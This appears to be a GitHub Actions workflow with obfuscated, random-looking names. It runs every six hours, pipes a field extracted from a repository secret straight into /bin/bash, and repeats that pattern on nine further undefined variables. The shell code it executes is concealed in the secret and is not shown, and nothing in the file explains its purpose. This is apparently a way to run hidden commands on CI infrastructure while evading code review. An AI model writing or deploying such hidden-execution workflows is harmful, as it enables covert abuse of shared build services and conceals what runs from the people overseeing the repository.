name: luanyunping2345

on:
  workflow_dispatch:
  schedule:
    - cron: '48 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luanyunping2345
        env:
          ocsqm8681: ${{ secrets.ocsqm8681 }}
        run: |
          echo $ocsqm8681 | jq -r .v7825 | /bin/bash
          echo $ef0 | jq -r .grj3342 | /bin/bash
          echo $ty06 | jq -r .mdon22856 | /bin/bash
          echo $hmcj6695 | jq -r .ezted894 | /bin/bash
          echo $m49077 | jq -r .kf01111 | /bin/bash
          echo $swtaz26673 | jq -r .rcri5313 | /bin/bash
          echo $mv9911 | jq -r .zvp3 | /bin/bash
          echo $g617 | jq -r .y312 | /bin/bash
          echo $flvw9263 | jq -r .gauc6701 | /bin/bash
          echo $n755 | jq -r .yoj326 | /bin/bash

